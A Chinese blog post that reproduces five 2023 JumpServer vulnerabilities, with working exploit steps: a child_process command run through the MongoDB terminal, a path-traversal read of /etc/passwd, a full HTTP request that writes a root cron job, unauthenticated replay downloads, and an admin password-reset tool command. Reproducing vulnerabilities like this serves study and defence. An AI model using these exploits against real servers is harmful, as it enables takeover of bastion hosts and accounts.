电脑网站怎么做的,oa系统办公平台,企业网站托管外包方案,wordpress与知更鸟本文主要复现JumpServer2023年出现的大批量漏洞#xff0c;既是分享也是为了记录自己的成长#xff0c;近期会持续更新。
1. JumpServer MongoDB远程代码执行漏洞#xff08;CVE-2023-43651#xff09;
1.1 漏洞级别
高危
1.2 漏洞描述
经过身份验证的用户可以利用Mon…本文主要复现JumpServer2023年出现的大批量漏洞既是分享也是为了记录自己的成长近期会持续更新。
1. JumpServer MongoDB远程代码执行漏洞CVE-2023-43651
1.1 漏洞级别
高危
1.2 漏洞描述
经过身份验证的用户可以利用MongoDB会话中的漏洞执行任意命令成功利用该漏洞的攻击者可获取目标系统上的root权限最终可实现远程代码执行。
1.3利用范围
2.24 jumpserverv 2.x 2.28.20
jumpserverv 3.x 3.6.41.4 漏洞复现
这个漏洞很简单只要在漏洞版本且启用了koko组件就存在。在Web Terminal模块连接数据库即可在命令行中执行js代码
console.log(require(child_process).execSync(id).toString())注之所以这是一个高危漏洞因为执行该命令的是堡垒机所在的机器而不是安装有mongo的宿主机。
2.JumpServer任意文件读取漏洞CVE-2023-42819
2.1 漏洞级别
高危
2.2 漏洞描述
JumpServer中存在远程代码执行漏洞具有低权限的远程攻击者成功利用该漏洞可登录访问系统最终实现目标系统上执行任意代码或修改任意文件内容。
2.3利用范围
3.0.0 JumpServer 3.6.42.4 漏洞复现
创建playbook。位置在“工作台 - 作业中心 - 模板管理 - Playbook管理 - 创建Playbook”创建后会获得一个id 访问链接
[url]/api/v1/ops/playbook/[id]/file/?key/etc/passwd即可成功获得敏感文件内容
2.4.2 进一步利用
我们可以通过写入定时任务的方式进行进一步利用。
POST /api/v1/ops/playbook/bd456105-c552-44ec-b890-6216656c1f7e/file/ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: SESSION_COOKIE_NAME_PREFIXjms_; jms_public_keyLS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FEdEhwL0JkRWtqYjNkb2NObWVGaGlxUFhVeQo0N0RPbU1DMTZ4QTBuL29ubWdIU3FXdktSSGlHQmlDdDNDTG1yUDM4MXpFZGZHaXA0anE1QThIS2grVjgyVjdCCk1IS044S29GTUZMZ3RFbGUwMTNRZTBSRTRWclgzc3JzZ05sZGNuVUQ1eVpFQTEyR2hUcWRPNTRpejQ4RmtOS1AKbjNMMS9jZDdIUlZsSm9TWUNRSURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQ; jms_sessionid708sbyw1e1zmfw79wdcbot2omas8cw3z; jms_csrftokenSqmVxQn9Ue50oVvrEtQMMSy4MFjXhZaVdngoWFM0MZ2WdaKNjISftqKndsD9Dw3f; X-JMS-ORG00000000-0000-0000-0000-000000000002; sidebarStatus1; django_languagezh-hans; activeTabPlaybookDetail; jms_session_expireclose
Upgrade-Insecure-Requests: 1
X-CSRFToken:SqmVxQn9Ue50oVvrEtQMMSy4MFjXhZaVdngoWFM0MZ2WdaKNjISftqKndsD9Dw3f
Content-Type: application/json
Content-Length: 116{key:/etc/cron.d,
is_directory:false,
name:test1,
content:* * * * * root touch /tmp/success\n
}key值为创建文件的目录name为文件名content为文件内容header中必须要有X-CSRFToken头值为cookie中的jms_csrftoken的值header中必须有Content-Type值为application/json
3. Session录像任意下载漏洞(CVE-2023-42442)
3.1 漏洞级别
高危
3.2 漏洞描述
API接口/api/v1/terminal/sessions/权限控制被破坏该API会话重放可以在没有身份验证的情况下下载。利用该漏洞可以访问录像文件远程获取到敏感信息。
3.3利用范围
3.0.0 JumpServer 3.5.4
3.6.0 JumpServer 3.6.33.4 漏洞复现
访问接口即可获取session信息。
url/api/v1/terminal/sessions/获取replay的数据 我们发起get请求访问以下路径
url/meida/xpack/../replay/[date]/[id].cast.gzdate格式为2023-11-13id的值为上一步中获取的id
获取结果如下
4. 随机数种子泄漏造成用户接管漏洞(CVE-2023-42820)
4.1 漏洞级别
高危
4.2 漏洞描述
JumpServer中存在密码重置漏洞由于第三方库将随机种子数暴露给了API可能导致随机验证码被重放未经身份验证的远程攻击者通过构造恶意请求重置密码。
4.3利用范围
2.24 JumpServer 3.6.4
注我在2.27版本下测试时并不能直接获取到token如何进一步利用没有研究出来有研究的可以分享一下4.4 漏洞复现
4.4.1 快速通关
可以使用下列项目
https://github.com/tarimoe/blackjump执行命令
python3 blackjump.py rest [url]
如果知道目标的用户名和邮箱可以指定 --user 和 --email 参数,默认是admin账号
注该脚本会直接修改目标账号密码使用需要谨慎使用新密码即可成功登录
5. 重置密码Token可爆破漏洞(CVE-2023-43650)
5.1 漏洞级别
高危
5.2 漏洞描述
由于重置用户密码的验证码没有速率限制未经身份验证的远程攻击者可通过请求重置密码爆破收到的6位验证码来实现劫持非MFA帐户。
5.3利用范围
2.0.0 JumpServer 2.28.19
3.0.0 JumpServer 3.7.0
注我在2.27版本下测试时不要输出邮箱验证码如何进一步利用没有研究出来有研究的可以分享一下5.4 漏洞复现
在3.1.0版本下无法复现对验证码进行爆破会提交验证码过期 该版本下漏洞可能已经修复了。漏洞原理简单抓包bp直接爆破就行。